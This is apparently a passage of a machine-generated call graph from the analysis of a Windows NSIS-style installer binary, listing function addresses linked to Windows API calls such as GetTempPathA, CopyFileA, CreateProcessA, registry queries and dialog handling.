4598->4599 4599->4533 4606 10001215 GlobalAlloc 4600->4606 4602 10001233 lstrcpynA 4602->4525 4603->4532 4604->4526 4605->4531 4606->4602 4608 100012b4 4607->4608 4609 10001224 2 API calls 4608->4609 4610 100012cf 4609->4610 4610->4543 4612 10002581 4611->4612 4613 1000252b VirtualAlloc 4611->4613 4612->4545 4613->4612 4614->4575 4616 100012f9 4615->4616 4617 100012da 4615->4617 4616->4575 4617->4616 4618 100012e0 lstrcpyA 4617->4618 4618->4616 4619->4580 3753 403180 SetErrorMode GetVersion 3754 4031b7 3753->3754 3755 4031bd 3753->3755 3756 406139 5 API calls 3754->3756 3841 4060cb GetSystemDirectoryA 3755->3841 3756->3755 3758 4031d3 lstrlenA 3758->3755 3759 4031e2 3758->3759 3844 406139 GetModuleHandleA 3759->3844 3762 406139 5 API calls 3763 4031f1 #17 OleInitialize SHGetFileInfoA 3762->3763 3850 405da0 lstrcpynA 3763->3850 3765 40322e GetCommandLineA 3851 405da0 lstrcpynA 3765->3851 3767 403240 GetModuleHandleA 3768 403257 3767->3768 3852 40583d 3768->3852 3771 403345 3772 403358 GetTempPathA 3771->3772 3856 40314f 3772->3856 3774 403370 3775 403374 GetWindowsDirectoryA lstrcatA 3774->3775 3776 4033ca DeleteFileA 3774->3776 3778 40314f 12 API calls 3775->3778 3866 402cfa GetTickCount GetModuleFileNameA 3776->3866 3777 40583d CharNextA 3779 40327b 3777->3779 3781 403390 3778->3781 3779->3771 3779->3777 3782 403347 3779->3782 3781->3776 3784 403394 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3781->3784 3951 405da0 lstrcpynA 3782->3951 3783 4033de 3790 40583d CharNextA 3783->3790 3823 403464 3783->3823 3836 403474 3783->3836 3786 40314f 12 API calls 3784->3786 3788 4033c2 3786->3788 3788->3776 3788->3836 3792 4033f9 3790->3792 3800 4034a4 3792->3800 3801 40343f 3792->3801 3793 4035ac 3796 4035b4 GetCurrentProcess OpenProcessToken 3793->3796 3797 40362e ExitProcess 3793->3797 3794 40348e 3975 405596 3794->3975 3802 4035ff 3796->3802 3803 4035cf LookupPrivilegeValueA AdjustTokenPrivileges 3796->3803 3979 405519 3800->3979 3952 405900 3801->3952 3806 406139 5 API calls 3802->3806 3803->3802 3809 403606 3806->3809 3812 40361b ExitWindowsEx 3809->3812 3815 403627 3809->3815 3810 4034c5 lstrcatA lstrcmpiA 3814 4034e1 3810->3814 3810->3836 3811 4034ba lstrcatA 3811->3810 3812->3797 3812->3815 3817 4034e6 3814->3817 3818 4034ed 3814->3818 4017 40140b 3815->4017 3816 403459 3967 405da0 lstrcpynA 3816->3967 3982 40547f CreateDirectoryA 3817->3982 3987 4054fc CreateDirectoryA 3818->3987 3894 403720 3823->3894 3825 4034f2 SetCurrentDirectoryA 3826 403501 3825->3826 3827 40350c 3825->3827 3990 405da0 lstrcpynA 3826->3990 3991 405da0 lstrcpynA 3827->3991 3832 403558 CopyFileA 3838 40351a 3832->3838 3833 4035a0 3834 405c5b 38 API calls 3833->3834 3834->3836 3968 403646 3836->3968 3837 405dc2 18 API calls 3837->3838 3838->3833 3838->3837 3840 40358c CloseHandle 3838->3840 3992 405dc2 3838->3992 4010 405c5b MoveFileExA 3838->4010 4014 405531 CreateProcessA 3838->4014 3840->3838 3843 4060ed wsprintfA LoadLibraryExA 3841->3843 3843->3758 3845 406155 3844->3845 3846 40615f GetProcAddress 3844->3846 3847 4060cb 3 API calls 3845->3847 3848 4031ea 3846->3848 3849 40615b 3847->3849 3848->3762 3849->3846 3849->3848 3850->3765 3851->3767 3853 405843 3852->3853 3854 40326b CharNextA 3853->3854 3855 405849 CharNextA 3853->3855 3854->3779 3855->3853 4020 40600b 3856->4020 3858 403165 3858->3774 3859 40315b 3859->3858 4029 405812 lstrlenA CharPrevA 3859->4029 3862 4054fc 2 API calls 3863 403173 3862->3863 4032 405a42 3863->4032 4036 405a13 GetFileAttributesA CreateFileA 3866->4036 3868 402d3a 3869 402d4a 3868->3869 4037 405da0 lstrcpynA 3868->4037 3869->3783 3871 402d60 4038 405859 lstrlenA 3871->4038 3875 402d71 GetFileSize 3876 402d88 3875->3876 3891 402e6d 3875->3891 3876->3869 3881 402ed9 3876->3881 3889 402c96 6 API calls 3876->3889 3876->3891 4075 403122 3876->4075 3878 402e76 3878->3869 3880 402ea6 GlobalAlloc 3878->3880 4078 403138 SetFilePointer 3878->4078 4054 403138 SetFilePointer 3880->4054 3885 402c96 6 API calls 3881->3885 3884 402ec1 4055 402f33 3884->4055 3885->3869 3886 402e8f 3888 403122 ReadFile 3886->3888 3890 402e9a 3888->3890 3889->3876 3890->3869 3890->3880 4043 402c96 3891->4043 3892 402ecd 3892->3869 3892->3892 3893 402f0a SetFilePointer 3892->3893 3893->3869 3895 406139 5 API calls 3894->3895 3896 403734 3895->3896 3897 40373a 3896->3897 3898 40374c 3896->3898 4108 405cfe wsprintfA 3897->4108 4109 405c87 RegOpenKeyExA 3898->4109 3901 403795 lstrcatA 3904 40374a 3901->3904 3903 405c87 3 API calls 3903->3901 4099 4039e5 3904->4099 3907 405900 18 API calls 3908 4037c7 3907->3908 3909 403850 3908->3909 3911 405c87 3 API calls 3908->3911 3910 405900 18 API calls 3909->3910 3912 403856 3910->3912 3913 4037f3 3911->3913 3914 403866 LoadImageA 3912->3914 3915 405dc2 18 API calls 3912->3915 3913->3909 3920 40380f lstrlenA 3913->3920 3921 40583d CharNextA 3913->3921 3916 40390c 3914->3916 3917 40388d RegisterClassA 3914->3917 3915->3914 3919 40140b 2 API calls 3916->3919 3918 4038c3 SystemParametersInfoA CreateWindowExA 3917->3918 3950 403916 3917->3950 3918->3916 3924 403912 3919->3924 3922 403843 3920->3922 3923 40381d lstrcmpiA 3920->3923 3925 40380d 3921->3925 3927 405812 3 API calls 3922->3927 3923->3922 3926 40382d GetFileAttributesA 3923->3926 3929 4039e5 19 API calls 3924->3929 3924->3950 3925->3920 3928 403839 3926->3928 3930 403849 3927->3930 3928->3922 3931 405859 2 API calls 3928->3931 3932 403923 3929->3932 4114 405da0 lstrcpynA 3930->4114 3931->3922 3934 4039b2 3932->3934 3935 40392f ShowWindow 3932->3935 4115 40508b OleInitialize 3934->4115 3937 4060cb 3 API calls 3935->3937 3939 403947 3937->3939 3938 4039b8 3940 4039d4 3938->3940 3941 4039bc 3938->3941 3942 403955 GetClassInfoA 3939->3942 3946 4060cb 3 API calls 3939->3946 3945 40140b 2 API calls 3940->3945 3948 40140b 2 API calls 3941->3948 3941->3950 3943 403969 GetClassInfoA RegisterClassA 3942->3943 3944 40397f DialogBoxParamA 3942->3944 3943->3944 3947 40140b 2 API calls 3944->3947 3945->3950 3946->3942 3949 4039a7 3947->3949 3948->3950 3949->3950 3950->3836 3951->3772 4130 405da0 lstrcpynA 3952->4130 3954 405911 4131 4058ab CharNextA CharNextA 3954->4131 3957 40344a 3957->3836 3966 405da0 lstrcpynA 3957->3966 3958 40600b 5 API calls 3964 405927 3958->3964 3959 405952 lstrlenA 3960 40595d 3959->3960 3959->3964 3961 405812 3 API calls 3960->3961 3963 405962 GetFileAttributesA 3961->3963 3963->3957 3964->3957 3964->3959 3965 405859 2 API calls 3964->3965 4137 4060a4 FindFirstFileA 3964->4137 3965->3959 3966->3816 3967->3823 3969 403650 CloseHandle 3968->3969 3970 40365e 3968->3970 3969->3970 4140 40368b 3970->4140 3976 4055ab 3975->3976 3977 40349c ExitProcess 3976->3977 3978 4055bf MessageBoxIndirectA 3976->3978 3978->3977 3980 406139 5 API calls 3979->3980 3981 4034a9 lstrcatA 3980->3981 3981->3810 3981->3811 3983 4054d0 GetLastError 3982->3983 3984 4034eb 3982->3984 3983->3984 3985 4054df SetFileSecurityA 3983->3985 3984->3825 3985->3984 3986 4054f5 GetLastError 3985->3986 3986->3984 3988 405510 GetLastError 3987->3988 3989 40550c 3987->3989 3988->3989 3989->3825 3990->3827 3991->3838 3993 405dcf 3992->3993 3994 405ff2 3993->3994 3997 405e70 GetVersion 3993->3997 3998 405fc9 lstrlenA 3993->3998 4001 405dc2 10 API calls 3993->4001 4002 405ee8 GetSystemDirectoryA 3993->4002 4003 405c87 3 API calls 3993->4003 4004 405efb GetWindowsDirectoryA 3993->4004 4005 40600b 5 API calls 3993->4005 4006 405f2f SHGetSpecialFolderLocation 3993->4006 4007 405dc2 10 API calls 3993->4007 4008 405f72 lstrcatA 3993->4008 4197 405cfe wsprintfA 3993->4197 4198 405da0 lstrcpynA 3993->4198 3995 40354b DeleteFileA 3994->3995 4199 405da0 lstrcpynA 3994->4199 3995->3832 3995->3838 3997->3993 3998->3993 4001->3998 4002->3993 4003->3993 4004->3993 4005->3993 4006->3993 4009 405f47 SHGetPathFromIDListA CoTaskMemFree 4006->4009 4007->3993 4008->3993 4009->3993 4011 405c7c 4010->4011 4012 405c6f 4010->4012 4011->3838 4200 405ae9 lstrcpyA 4012->4200 4015 405570 4014->4015 4016 405564 CloseHandle 4014->4016 4015->3838 4016->4015 4018 401389 2 API calls 4017->4018 4019 401420 4018->4019 4019->3797 4026 406017 4020->4026 4021 406083 CharPrevA 4022 40607f 4021->4022 4022->4021 4025 40609e 4022->4025 4023 406074 CharNextA 4023->4022 4023->4026 4024 40583d CharNextA 4024->4026 4025->3859 4026->4022 4026->4023 4026->4024 4027 406062 CharNextA 4026->4027 4028 40606f CharNextA 4026->4028 4027->4026 4028->4023 4030 40316d 4029->4030 4031 40582c lstrcatA 4029->4031 4030->3862 4031->4030 4033 405a4d GetTickCount GetTempFileNameA 4032->4033 4034 40317e 4033->4034 4035 405a7a 4033->4035 4034->3774 4035->4033 4035->4034 4036->3868 4037->3871 4039 405866 4038->4039 4040 402d66 4039->4040 4041 40586b CharPrevA 4039->4041 4042 405da0 lstrcpynA 4040->4042 4041->4039 4041->4040 4042->3875 4044 402cb7 4043->4044 4045 402c9f 4043->4045 4048 402cc7 GetTickCount 4044->4048 4049 402cbf 4044->4049 4046 402ca8 DestroyWindow 4045->4046 4047 402caf 4045->4047 4046->4047 4047->3878 4051 402cd5 CreateDialogParamA ShowWindow 4048->4051 4052 402cf8 4048->4052 4079 406175 4049->4079 4051->4052 4052->3878 4054->3884 4056 402f49 4055->4056 4057 402f77 4056->4057 4085 403138 SetFilePointer 4056->4085 4059 403122 ReadFile 4057->4059 4060 402f82 4059->4060 4061 402f94 GetTickCount 4060->4061 4062 4030bb 4060->4062 4064 4030a5 4060->4064 4061->4064 4071 402fc0 4061->4071 4063 4030fd 4062->4063 4068 4030bf 4062->4068 4066 403122 ReadFile 4063->4066 4064->3892 4065 403122 ReadFile 4065->4071 4066->4064 4067 403122 ReadFile 4067->4068 4068->4064 4068->4067 4069 405aba WriteFile 4068->4069 4069->4068 4070 403016 GetTickCount 4070->4071 4071->4064 4071->4065 4071->4070 4072 40303b MulDiv wsprintfA 4071->4072 4083 405aba WriteFile 4071->4083 4086 404fb9 4072->4086 4097 405a8b ReadFile 4075->4097 4078->3886 4080 406192 PeekMessageA 4079->4080 4081 402cc5 4080->4081 4082 406188 DispatchMessageA 4080->4082 4081->3878 4082->4080 4084 405ad8 4083->4084 4084->4071 4085->4057 4087 404fd4 4086->4087 4096 405077 4086->4096 4088 404ff1 lstrlenA 4087->4088 4089 405dc2 18 API calls 4087->4089 4090 40501a 4088->4090 4091 404fff lstrlenA 4088->4091 4089->4088 4093 405020 SetWindowTextA 4090->4093 4094 40502d 4090->4094 4092 405011 lstrcatA 4091->4092 4091->4096 4092->4090 4093->4094 4095 405033 SendMessageA SendMessageA SendMessageA 4094->4095 4094->4096 4095->4096 4096->4071 4098 403135 4097->4098 4098->3876 4100 4039f9 4099->4100 4122 405cfe wsprintfA 4100->4122 4102 403a6a 4103 405dc2 18 API calls 4102->4103 4104 403a76 SetWindowTextA 4103->4104 4105 403a92 4104->4105 4106 4037a5 4104->4106 4105->4106 4107 405dc2 18 API calls 4105->4107 4106->3907 4107->4105 4108->3904 4110 403777 4109->4110 4111 405cba RegQueryValueExA 4109->4111 4110->3901 4110->3903 4112 405cdb RegCloseKey 4111->4112 4112->4110 4114->3909 4123 403fd1 4115->4123 4117 4050ae 4121 4050d5 4117->4121 4126 401389 4117->4126 4118 403fd1 SendMessageA 4119 4050e7 OleUninitialize 4118->4119 4119->3938 4121->4118 4122->4102 4124 403fe9 4123->4124 4125 403fda SendMessageA 4123->4125 4124->4117 4125->4124 4128 401390 4126->4128 4127 4013fe 4127->4117 4128->4127 4129 4013cb MulDiv SendMessageA 4128->4129 4129->4128 4130->3954 4132 4058d6 4131->4132 4133 4058c6 4131->4133 4135 40583d CharNextA 4132->4135 4136 4058f6 4132->4136 4133->4132 4134 4058d1 CharNextA 4133->4134 4134->4136 4135->4132 4136->3957 4136->3958 4138 4060c5 4137->4138 4139 4060ba FindClose 4137->4139 4138->3964 4139->4138 4142 403699 4140->4142 4141 403663 4144 405642 4141->4144 4142->4141 4143 40369e FreeLibrary GlobalFree 4142->4143 4143->4141 4143->4143 4145 405900 18 API calls 4144->4145 4146 405662 4145->4146 4147 405681 4146->4147 4148 40566a DeleteFileA 4146->4148 4150 4057b9 4147->4150 4184 405da0 lstrcpynA 4147->4184 4149 40347d OleUninitialize 4148->4149 4149->3793 4149->3794 4150->4149 4155 4060a4 2 API calls 4150->4155 4152 4056a7 4153 4056ba 4152->4153 4154 4056ad lstrcatA 4152->4154 4157 405859 2 API calls 4153->4157 4156 4056c0 4154->4156 4158 4057d3 4155->4158 4159 4056ce lstrcatA 4156->4159 4161 4056d9 lstrlenA FindFirstFileA 4156->4161 4157->4156 4158->4149 4160 4057d7 4158->4160 4159->4161 4162 405812 3 API calls 4160->4162 4163 4057af 4161->4163 4182 4056fd 4161->4182 4164 4057dd 4162->4164 4163->4150 4166 4055fa 5 API calls 4164->4166 4165 40583d CharNextA 4165->4182 4167 4057e9 4166->4167 4168 405803 4167->4168 4169 4057ed 4167->4169 4172 404fb9 25 API calls 4168->4172 4169->4149 4174 404fb9 25 API calls 4169->4174 4170 40578e FindNextFileA 4173 4057a6 FindClose 4170->4173 4170->4182 4172->4149 4173->4163 4175 4057fa 4174->4175 4176 405c5b 38 API calls 4175->4176 4179 405801 4176->4179 4178 405642 62 API calls 4178->4182 4179->4149 4180 404fb9 25 API calls 4180->4170 4181 404fb9 25 API calls 4181->4182 4182->4165 4182->4170 4182->4178 4182->4180 4182->4181 4183 405c5b 38 API calls 4182->4183 4185 405da0 lstrcpynA 4182->4185 4186 4055fa 4182->4186 4183->4182 4184->4152 4185->4182 4194 4059ee GetFileAttributesA 4186->4194 4189 405615 RemoveDirectoryA 4191 405623 4189->4191 4190 40561d DeleteFileA 4190->4191 4192 405627 4191->4192 4193 405633 SetFileAttributesA 4191->4193 4192->4182 4193->4192 4195 405a00 SetFileAttributesA 4194->4195 4196 405606 4194->4196 4195->4196 4196->4189 4196->4190 4196->4192 4197->3993 4198->3993 4199->3995 4201 405b11 4200->4201 4202 405b37 GetShortPathNameA 4200->4202 4227 405a13 GetFileAttributesA CreateFileA 4201->4227 4203 405c56 4202->4203 4204 405b4c 4202->4204 4203->4011 4204->4203 4206 405b54 wsprintfA 4204->4206 4208 405dc2 18 API calls 4206->4208 4207 405b1b CloseHandle GetShortPathNameA 4207->4203 4209 405b2f 4207->4209 4210 405b7c 4208->4210 4209->4202 4209->4203 4228 405a13 GetFileAttributesA CreateFileA 4210->4228 4212 405b89 4212->4203 4213 405b98 GetFileSize GlobalAlloc 4212->4213 4214 405bba 4213->4214 4215 405c4f CloseHandle 4213->4215 4216 405a8b ReadFile 4214->4216 4215->4203 4217 405bc2 4216->4217 4217->4215 4229 405978 lstrlenA 4217->4229 4220 405bd9 lstrcpyA 4223 405bfb 4220->4223 4221 405bed 4222 405978 4 API calls 4221->4222 4222->4223 4224 405c32 SetFilePointer 4223->4224 4225 405aba WriteFile 4224->4225 4226 405c48 GlobalFree 4225->4226 4226->4215 4227->4207 4228->4212 4230 4059b9 lstrlenA 4229->4230 4231 405992 lstrcmpiA 4230->4231 4233 4059c1 4230->4233 4232 4059b0 CharNextA 4231->4232 4231->4233 4232->4230 4233->4220 4233->4221 5083 401000 5084 401037 BeginPaint GetClientRect 5083->5084 5085 40100c DefWindowProcA 5083->5085 5087 4010f3 5084->5087 5088 401179 5085->5088 5089 401073 CreateBrushIndirect FillRect DeleteObject 5087->5089 5090 4010fc 5087->5090 5089->5087 5091 401102 CreateFontIndirectA 5090->5091 5092 401167 EndPaint 5090->5092 5091->5092 5093 401112 6 API calls 5091->5093 5092->5088 5093->5092 5094 401900 5095 402ace 18 API calls 5094->5095 5096 401907 5095->5096 5097 405596 MessageBoxIndirectA 5096->5097 5098 401910 5097->5098 5099 401502 5100 40150a 5099->5100 5102 40151d 5099->5102 5101 402aac 18 API calls 5100->5101 5101->5102 4234 402483 4245 402bd8 4234->4245 4236 40248d 4249 402ace 4236->4249 4239 4024a0 RegQueryValueExA 4241 4024c0 4239->4241 4242 4024c6 RegCloseKey 4239->4242 4240 402729 4241->4242 4255 405cfe wsprintfA 4241->4255 4242->4240 4246 402ace 18 API calls 4245->4246 4247 402bf1 4246->4247 4248 402bff RegOpenKeyExA 4247->4248 4248->4236 4250 402ada 4249->4250 4251 405dc2 18 API calls 4250->4251 4252 402afb 4251->4252 4253 402496 4252->4253 4254 40600b 5 API calls 4252->4254 4253->4239 4253->4240 4254->4253 4255->4242 5103 100029c3 5104 100029db 5103->5104 5105 10001534 2 API calls 5104->5105 5106 100029f6 5105->5106 5107 401c04 5108 402aac 18 API calls 5107->5108 5109 401c0b 5108->5109 5110 402aac 18 API calls 5109->5110 5111 401c18 5110->5111 5112 401c2d 5111->5112 5113 402ace 18 API calls 5111->5113 5114 401c3d 5112->5114 5115 402ace 18 API calls 5112->5115 5113->5112 5116 401c94 5114->5116 5117 401c48 5114->5117 5115->5114 5119 402ace 18 API calls 5116->5119 5118 402aac 18 API calls 5117->5118 5120 401c4d 5118->5120 5121 401c99 5119->5121 5122 402aac 18 API calls 5120->5122 5123 402ace 18 API calls 5121->5123 5124 401c59 5122->5124 5125 401ca2 FindWindowExA 5123->5125 5126 401c84 SendMessageA 5124->5126 5127 401c66 SendMessageTimeoutA 5124->5127 5128 401cc0 5125->5128 5126->5128 5127->5128 4262 401389 4264 401390 4262->4264 4263 4013fe 4264->4263 4265 4013cb MulDiv SendMessageA 4264->4265 4265->4264 5129 40270b 5130 402ace 18 API calls 5129->5130 5131 402712 FindFirstFileA 5130->5131 5132 402735 5131->5132 5136 402725 5131->5136 5133 40273c 5132->5133 5137 405cfe wsprintfA 5132->5137 5138 405da0 lstrcpynA 5133->5138 5137->5133 5138->5136 5139 401490 5140 404fb9 25 API calls 5139->5140 5141 401497 5140->5141 5142 402590 5143 402595 5142->5143 5144 4025a9 5142->5144 5145 402aac 18 API calls 5143->5145 5146 402ace 18 API calls 5144->5146 5148 40259e 5145->5148 5147 4025b0 lstrlenA 5146->5147 5147->5148 5149 405aba WriteFile 5148->5149 5150 4025d2 5148->5150 5149->5150 5151 402c13 5152 402c22 SetTimer 5151->5152 5154 402c3b 5151->5154 5152->5154 5153 402c90 5154->5153 5155 402c55 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5154->5155 5155->5153 5156 404714 5157 404740 5156->5157 5158 404724 5156->5158 5160 404773 5157->5160 5161 404746 SHGetPathFromIDListA 5157->5161 5167 40557a GetDlgItemTextA 5158->5167 5163 404756 5161->5163 5166 40475d SendMessageA 5161->5166 5162 404731 SendMessageA 5162->5157 5164 40140b 2 API calls 5163->5164 5164->5166 5166->5160 5167->5162 4305 401d95 GetDC 4306 402aac 18 API calls 4305->4306 4307 401da7 GetDeviceCaps MulDiv ReleaseDC 4306->4307 4308 402aac 18 API calls 4307->4308 4309 401dd8 4308->4309 4310 405dc2 18 API calls 4309->4310 4311 401e15 CreateFontIndirectA 4310->4311 4312 40258a 4311->4312 4313 402695 4314 40269c 4313->4314 4316 40290b 4313->4316 4315 402aac 18 API calls 4314->4315 4317 4026a3 4315->4317 4318 4026b2 SetFilePointer 4317->4318 4318->4316 4319 4026c2 4318->4319 4321 405cfe wsprintfA 4319->4321 4321->4316 5168 10001058 5170 10001074 5168->5170 5169 100010dc 5170->5169 5171 10001091 5170->5171 5172 100014bb GlobalFree 5170->5172 5173 100014bb GlobalFree 5171->5173 5172->5171 5174 100010a1 5173->5174 5175 100010b1 5174->5175 5176 100010a8 GlobalSize 5174->5176 5177 100010b5 GlobalAlloc 5175->5177 5178 100010c6 5175->5178 5176->5175 5179 100014e2 3 API calls 5177->5179 5180 100010d1 GlobalFree 5178->5180 5179->5178 5180->5169 5181 404099 lstrcpynA lstrlenA 5182 401d1a 5183 402aac 18 API calls 5182->5183 5184 401d28 SetWindowLongA 5183->5184 5185 40295e 5184->5185 4432 40159d 4433 402ace 18 API calls 4432->4433 4434 4015a4 SetFileAttributesA 4433->4434 4435 4015b6 4434->4435 5191 40149d 5192 4014ab PostQuitMessage 5191->5192 5193 4022dd 5191->5193 5192->5193 4436 401a1e 4437 402ace 18 API calls 4436->4437 4438 401a27 ExpandEnvironmentStringsA 4437->4438 4439 401a3b 4438->4439 4441 401a4e 4438->4441 4440 401a40 lstrcmpA 4439->4440 4439->4441 4440->4441 4620 40171f 4621 402ace 18 API calls 4620->4621 4622 401726 SearchPathA 4621->4622 4623 401741 4622->4623 5194 100010e0 5203 1000110e 5194->5203 5195 100011c4 GlobalFree 5196 100012ad 2 API calls 5196->5203 5197 100011c3 5197->5195 5198 10001266 2 API calls 5201 100011b1 GlobalFree 5198->5201 5199 10001155 GlobalAlloc 5199->5203 5200 100011ea GlobalFree 5200->5203 5201->5203 5202 100012d1 lstrcpyA 5202->5203 5203->5195 5203->5196 5203->5197 5203->5198 5203->5199 5203->5200 5203->5201 5203->5202 5204 10002162 5205 100021c0 5204->5205 5206 100021f6 5204->5206 5205->5206 5207 100021d2 GlobalAlloc 5205->5207 5207->5205 5208 401e25 5209 402aac 18 API calls 5208->5209 5210 401e2b 5209->5210 5211 402aac 18 API calls 5210->5211 5212 401e37 5211->5212 5213 401e43 ShowWindow 5212->5213 5214 401e4e EnableWindow 5212->5214 5215 40295e 5213->5215 5214->5215 5216 401f2d 5217 402ace 18 API calls 5216->5217 5218 401f34 5217->5218 5219 4060a4 2 API calls 5218->5219 5220 401f3a 5219->5220 5222 401f4c 5220->5222 5223 405cfe wsprintfA 5220->5223 5223->5222 5224 404f2d 5225 404f51 5224->5225 5226 404f3d 5224->5226 5227 404f59 IsWindowVisible 5225->5227 5235 404f70 5225->5235 5228 404f43 5226->5228 5229 404f9a 5226->5229 5227->5229 5230 404f66 5227->5230 5232 403fd1 SendMessageA 5228->5232 5231 404f9f CallWindowProcA 5229->5231 5237 404884 SendMessageA 5230->5237 5234 404f4d 5231->5234 5232->5234 5235->5231 5242 404904 5235->5242 5238 4048e3 SendMessageA 5237->5238 5239 4048a7 GetMessagePos ScreenToClient SendMessageA 5237->5239 5241 4048db 5238->5241 5240 4048e0 5239->5240 5239->5241 5240->5238 5241->5235 5251 405da0 lstrcpynA 5242->5251 5244 404917 5252 405cfe wsprintfA 5244->5252 5246 404921 5247 40140b 2 API calls 5246->5247 5248 40492a 5247->5248 5253 405da0 lstrcpynA 5248->5253 5250 404931 5250->5229 5251->5244 5252->5246 5253->5250 5254 403ab2 5255 403c05 5254->5255 5256 403aca 5254->5256 5258 403c56 5255->5258 5259 403c16 GetDlgItem GetDlgItem 5255->5259 5256->5255 5257 403ad6 5256->5257 5260 403ae1 SetWindowPos 5257->5260 5261 403af4 5257->5261 5263 403cb0 5258->5263 5272 401389 2 API calls 5258->5272 5262 403f85 19 API calls 5259->5262 5260->5261 5265 403b11 5261->5265 5266 403af9 ShowWindow 5261->5266 5267 403c40 SetClassLongA 5262->5267 5264 403fd1 SendMessageA 5263->5264 5268 403c00 5263->5268 5294 403cc2 5264->5294 5269 403b33 5265->5269 5270 403b19 DestroyWindow 5265->5270 5266->5265 5271 40140b 2 API calls 5267->5271 5274 403b38 SetWindowLongA 5269->5274 5275 403b49 5269->5275 5273 403f0e 5270->5273 5271->5258 5276 403c88 5272->5276 5273->5268 5283 403f3f ShowWindow 5273->5283 5274->5268 5280 403bc0 5275->5280 5281 403b55 GetDlgItem 5275->5281 5276->5263 5277 403c8c SendMessageA 5276->5277 5277->5268 5278 40140b 2 API calls 5278->5294 5279 403f10 DestroyWindow EndDialog 5279->5273 5282 403fec 8 API calls 5280->5282 5284 403b85 5281->5284 5285 403b68 SendMessageA IsWindowEnabled 5281->5285 5282->5268 5283->5268 5287 403b92 5284->5287 5288 403bd9 SendMessageA 5284->5288 5289 403ba5 5284->5289 5297 403b8a 5284->5297 5285->5268 5285->5284 5286 405dc2 18 API calls 5286->5294 5287->5288 5287->5297 5288->5280 5292 403bc2 5289->5292 5293 403bad 5289->5293 5290 403f5e SendMessageA 5290->5280 5291 403f85 19 API calls 5291->5294 5296 40140b 2 API calls 5292->5296 5295 40140b 2 API calls 5293->5295 5294->5268 5294->5278 5294->5279 5294->5286 5294->5291 5298 403f85 19 API calls 5294->5298 5313 403e50 DestroyWindow 5294->5313 5295->5297 5296->5297 5297->5280 5297->5290 5299 403d3d GetDlgItem 5298->5299 5300 403d52 5299->5300 5301 403d5a ShowWindow EnableWindow 5299->5301 5300->5301 5322 403fa7 EnableWindow 5301->5322 5303 403d84 EnableWindow 5306 403d98 5303->5306 5304 403d9d GetSystemMenu EnableMenuItem SendMessageA 5305 403dcd SendMessageA 5304->5305 5304->5306 5305->5306 5306->5304 5323 403fba SendMessageA 5306->5323 5324 405da0 lstrcpynA 5306->5324 5309 403dfb lstrlenA 5310 405dc2 18 API calls 5309->5310 5311 403e0c SetWindowTextA 5310->5311 5312 401389 2 API calls 5311->5312 5312->5294 5313->5273 5314 403e6a CreateDialogParamA 5313->5314 5314->5273 5315 403e9d 5314->5315 5316 403f85 19 API calls 5315->5316 5317 403ea8 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5316->5317 5318 401389 2 API calls 5317->5318 5319 403eee 5318->5319 5319->5268 5320 403ef6 ShowWindow 5319->5320 5321 403fd1 SendMessageA 5320->5321 5321->5273 5322->5303 5323->5306 5324->5309 5325 401eb3 5326 402ace 18 API calls 5325->5326 5327 401eb9 5326->5327 5328 404fb9 25 API calls 5327->5328 5329 401ec3 5328->5329 5330 405531 2 API calls 5329->5330 5333 401ec9 5330->5333 5331 401f1f CloseHandle 5335 402729 5331->5335 5332 401ee8 WaitForSingleObject 5332->5333 5334 401ef6 GetExitCodeProcess 5332->5334 5333->5331 5333->5332 5333->5335 5336 406175 2 API calls 5333->5336 5337 401f11 5334->5337 5338 401f08 5334->5338 5336->5332 5337->5331 5340 405cfe wsprintfA 5338->5340 5340->5337 4327 402336 4328 402ace 18 API calls 4327->4328 4329 402347 4328->4329 4330 402ace 18 API calls 4329->4330 4331 402350 4330->4331 4332 402ace 18 API calls 4331->4332 4333 40235a GetPrivateProfileStringA 4332->4333 5341 404936 GetDlgItem GetDlgItem 5342 404988 7 API calls 5341->5342 5348 404ba0 5341->5348 5343 404a2b DeleteObject 5342->5343 5344 404a1e SendMessageA 5342->5344 5345 404a34 5343->5345 5344->5343 5346 404a6b 5345->5346 5347 405dc2 18 API calls 5345->5347 5349 403f85 19 API calls 5346->5349 5351 404a4d SendMessageA SendMessageA 5347->5351 5355 404c84 5348->5355 5358 404884 5 API calls 5348->5358 5378 404c11 5348->5378 5354 404a7f 5349->5354 5350 404d30 5352 404d42 5350->5352 5353 404d3a SendMessageA 5350->5353 5351->5345 5362 404d54 ImageList_Destroy 5352->5362 5363 404d5b 5352->5363 5373 404d6b 5352->5373 5353->5352 5359 403f85 19 API calls 5354->5359 5355->5350 5360 404cdd SendMessageA 5355->5360 5384 404b93 5355->5384 5356 403fec 8 API calls 5361 404f26 5356->5361 5357 404c76 SendMessageA 5357->5355 5358->5378 5379 404a8d 5359->5379 5364 404cf2 SendMessageA 5360->5364 5360->5384 5362->5363 5366 404d64 GlobalFree 5363->5366 5363->5373 5368 404d05 5364->5368 5365 404eda 5369 404eec ShowWindow GetDlgItem ShowWindow 5365->5369 5365->5384 5366->5373 5367 404b61 GetWindowLongA SetWindowLongA 5370 404b7a 5367->5370 5374 404d16 SendMessageA 5368->5374 5369->5384 5371 404b80 ShowWindow 5370->5371 5372 404b98 5370->5372 5392 403fba SendMessageA 5371->5392 5393 403fba SendMessageA 5372->5393 5373->5365 5383 404904 4 API calls 5373->5383 5388 404da6 5373->5388 5374->5350 5375 404b5b 5375->5367 5375->5370 5378->5355 5378->5357 5379->5367 5379->5375 5380 404adc SendMessageA 5379->5380 5381 404b18 SendMessageA 5379->5381 5382 404b29 SendMessageA 5379->5382 5380->5379 5381->5379 5382->5379 5383->5388 5384->5356 5385 404eb0 InvalidateRect 5385->5365 5386 404ec6 5385->5386 5389 40483f 21 API calls 5386->5389 5387 404dd4 SendMessageA 5391 404dea 5387->5391 5388->5387 5388->5391 5389->5365 5390 404e5e SendMessageA SendMessageA 5390->5391 5391->5385 5391->5390 5392->5384 5393->5348 5394 4014b7 5395 4014bd 5394->5395 5396 401389 2 API calls 5395->5396 5397 4014c5 5396->5397 5398 401b39 5399 402ace 18 API calls 5398->5399 5400 401b40 5399->5400 5401 402aac 18 API calls 5400->5401 5402 401b49 wsprintfA 5401->5402 5403 40295e 5402->5403 5404 402939 SendMessageA 5405 402953 InvalidateRect 5404->5405 5406 40295e 5404->5406 5405->5406 4409 4015bb 4410 402ace 18 API calls 4409->4410 4411 4015c2 4410->4411 4412 4058ab 4 API calls 4411->4412 4425 4015ca 4412->4425 4413 401624 4415 401629 4413->4415 4417 401652 4413->4417 4414 40583d CharNextA 